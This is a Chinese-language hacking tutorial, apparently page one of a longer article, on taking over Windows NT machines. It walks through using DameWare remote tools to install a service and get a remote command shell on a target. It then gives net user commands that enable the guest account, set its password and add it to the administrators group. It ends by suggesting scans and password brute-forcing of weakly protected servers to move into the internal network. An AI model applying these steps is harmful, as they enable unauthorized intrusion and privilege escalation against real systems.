如果你已经夺取了一定的权限，比如，可写的，那么运用下面两个软件，可以轻易的帮你入侵： 
DNTUCli.exe 
DNTUS26.exe 
在命令提示下运行： 
D:\>DNTUCli.exe 

Usage: DNTUCli.exe <\\server> 

DNTUCli.exe \\MachineName (remote server is \\MachineName) 
DNTUCli.exe \\. (local server) 

Copyright (C) 1991-2001 DameWare Development 
www.dameware.com 
   当你输入ip的时候会让你输入用户和密码！只要对方开了rpc而且你的用户有可写的权限的话！！ 

    就会复制同一目录下的DNTUS26.exe，这种程序是自己安装而且自己打开服务的。然后你就可以直接连接到对方的c了！这种软件有CMD重定向功能··· 然后你就随便想做你的任何事情了！ 
C:\>net user 

\\FYNET33 的用户帐户 

---------------------------------- 
Administrator      Guest 
命令成功完成。 

C:\>net user guest /active:yes 
命令成功完成。 
C:\>net user guest wry 
命令成功完成。 

C:\>net user localgroup administrators　guest　/add 
命令成功完成。 

这个时候你的guest已经是管理员了！！如果你禁止了net.exe或者被删除了你可以用 
ftp命令下一个net.exe或者另外一个软件adduser.exe 
用法： 
D:\>addusers.exe 
ADDUSERS {/c|/d{:u}|/e} filename [/t][/s:x] [/?] [\\computername|domainname] [/p 
:{l|c|e|d}] 
Error: too few arguments 

现在你就是管理员了！要是感觉还不是很爽！呵呵！那么努力进它的内部网络吧！！ 
看： 

一，进入第一台假设平台的nt服务器 

    通过简单的扫描器，只需带有简单密码验证的哪些就已足够扫出那些防范教差的机器。通常的用户名不是空就是相同。绑定netbeui协议的nt平台有个致命的弱点允许攻击者得到本地用户名列表及采用暴力法不断验证他们的密码 。 

    然后，就是因为网管在意识上的不重视，攻击者几乎不需花很大的力气就能找到那些用户名和密码相同的 
或密码为空的服务器。 

[1] [2] 下一页